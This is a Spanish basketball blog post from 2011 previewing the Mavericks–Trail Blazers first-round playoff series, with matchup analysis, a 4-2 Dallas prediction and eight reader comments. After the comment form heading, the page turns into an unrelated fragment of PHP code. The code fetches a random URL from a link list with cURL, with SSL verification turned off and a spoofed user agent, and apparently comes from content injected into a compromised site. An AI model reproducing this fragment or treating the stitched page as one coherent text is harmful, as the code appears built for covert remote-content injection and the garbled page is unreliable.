Análisis Dallas Mavericks vs Portland Trailblazers

16 de April de 2011 por Viva_Dirk

Regular: 2-2

Mavericks: 100.2 PF –  96 PC
Trailblazers: 96.3 PF – 94.8 PC

Dallas se encuentra con una primera ronda muy incómoda como premio a una buena regular season. Los Mavs han demostrado un buen nivel todo el año gracias al “renacido” Tyson Chandler y al eterno Jason Kidd, termómetros del equipo, y al rendimiento de los yo clásicos Nowitzki y Terry. Una vez llegados aquí, y sin poder contar con Caron Butler, la batalla de esta eliminatoria va a exigir el máximo de cada componente tejano.

Las bajas han sido un año mas el hándicap/excusa de los Blazers. Su jugador franquicia, Brandon Roy, sólo ha podido disputar 47 partidos con una media de 28 minutos por noche y al número 1 del draft, Greg Oden, ya lo perdieron antes de empezar la temporada. De todas maneras, disfrutan de una plantilla compensada y extensa, con un Lamarcus Aldridge inmenso toda la temporada y reforzada a última hora con el ex-bobcat original, Gerald Wallace, un tipo de jugador del que carecían y que suele lucir mucho cuando hay que ponerse el mono de trabajo y jugar a lo que dicta McMillan.

Claves de la eliminatoria:

– Chandler&Kidd vs Camby&Miller: Los números cantan. Con Tyson Chandler consiguiendo un doble-doble los Mavs tienen un balance de 14-4, y con Jason Kidd repartiendo 10 o más asistencias dicho balance se eleva a 21-5. Enfrente dos veteranos de postín. Andre Miller ha sacado el máximo partido a jugadores como Wesley Matthews y Nicolas Batum a la vez que ha surtido de balones a LaMarcus. El ex de los Sixers ejerce un mando que va mas allá de los números. En cambio, números son los que promedía el veterano Marcu Camby. En 26 minutos de juego se va a más de 1o rebotes y además es básico en la intimidación.

– Estrella+6º hombre: Con la nueva versión de Roy podríamos asistir a una pelea entre Nowitzki y Aldridge liderando los quintetos titulares y a otra entre Terry y Roy liderando las segundas unidades. En la primera, el alemán puede abrir el campo para facilitar el camino al aro de sus compañeros y permitir a Chandler medir a Camby. Aldridge, por su parte, cuenta con ventaja en el poste bajo donde tiene movimientos y físico para batir al alemán. En la batalla de la segunda unidad Jason Terry parte con ventaja porque lleva siglos liderándola y cuenta con mejores compañeros que Brandon Roy. Este ha de adaptarse a sus nuevas circunstancias con un McMillan que no cambia ni un ápice sus esquemas. Por aquí podrían empezar a ganar la eliminatoria los Mavs.

– Rotación extensa vs rotación corta: Es algo que debemos reconocerle a Carlisle. Con un equipo veterano y a pesar de la baja de Butler, ha sabido dosificar a sus tropas. Ningún jugador acumula 35 minutos por noche y sólo 3 llegan a los 30. Este hecho, aparte del descanso de sus mejores hombres, ha provocado un gran funcionamiento de los suplentes que se antojan vitales llegados los play-offs. Por su parte, McMillan ha aprovechado la baja de Roy para definir un quinteto+6º hombre que ha disputado la gran parte de los minutos. Con la recuperación de Roy y la llegada de Wallace deberían ser 8 los jugadores que disfruten de un buen número de minutos.

Pronóstico: 4-2 Dallas

Comenta

8 comentarios a esta entrada

  1. Txusma dice:
    #1

    Siempre se ha dicho que Carlisle es un entrenado de Regular Season y no de Playoffs. Veremos.

      Citar

  2. sergio dice:
    #2

    A priori, lo veo el emparejamiento más parejo de la 1ª ronda. Quizás el Denver-OKC sea mas espectacular, pero este duelo lo veo muy igualado en todas las posiciones. Un pivot defensivo, un base muy experto y la estrella en el puesto de 4. La rotación en los puestos de 2 y 3 en ambos equipos es simplemente espectacular por calidad, recursos, variedad,….

    Veo a Carlisle algo inferior a McMillan, y mas ahora que parece que no puede abusar del “Roy-system”. También veo marcadores bastante bajos. Ambos equipos tienen un “timing” bastante reducido, jugando mucho a posesiones largas.

    El otro dia vi que el quinteto Miller, Matthews, Batum, Wallace, Aldridge es el quinteto mas anotador de la liga. A ver como pueden enfrentar ese dato los Mavs.

    Por cierto, que Rudy se vaya buscando un cojin bien mullido si no quiere tener dolores ante la cantidad de minutos que le esperan en el banquillo.

    Mi pronóstico es que si los Blazers son capaces de ganar uno de los dos primeros partidos, serán muy capaces de dar la sorpresa. Sólo 4 equipos han sido mejores que ellos en casa. Eso sí, prefiero que pasen los Mavs, que ya dijo Magic lo “mucho” que le gustan los Blazers contra sus Lakers en postemporada

      Citar

  3. Denise dice:
    #3

    Amen con el comentario de Sergio. Muy bueno lo del cojin mullido. Yo creo que el rol de Rudy en estos playoffs será salir 7 minutillos en cada parte, y tirarse 4-5 triples.

      Citar

  4. Javijaen dice:
    #4

    Venga, una relativa sorpresa con un 3-4 para Portland. Aunque los Mavs tienen las pilas cargadas, quizá se la peguen… otra vez..

      Citar

  5. Sr. Lagarto dice:
    #5

    Pues yo soy de los que piensan que un equipo tan rocoso como Portland ante Dallas (que la cagará tarde o temprano en play-offs) le va a hacer mucha pupa hasta el punto que doy favorito a los de Oregon.

    Saludos,
    Lagarto.

      Citar

  6. Toni dice:
    #6

    Cojín-sistem, muy buena esa sergio. Veo 1-1 en los dos primeros y el Rose Garden a petar… Una eliminatoria muy dificil para Carlisle.

      Citar

  7. German dice:
    #7

    Voy por la sorpresa aqui: 4-2 Portland. Creo que va a ser una serie muy pareja con todos partidos bastante igualados

      Citar

  8. Tobal dice:
    #8

    Será una eliminatoria muy disputada,yo creo que será 4 – 3 para Dallas Mavericks.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>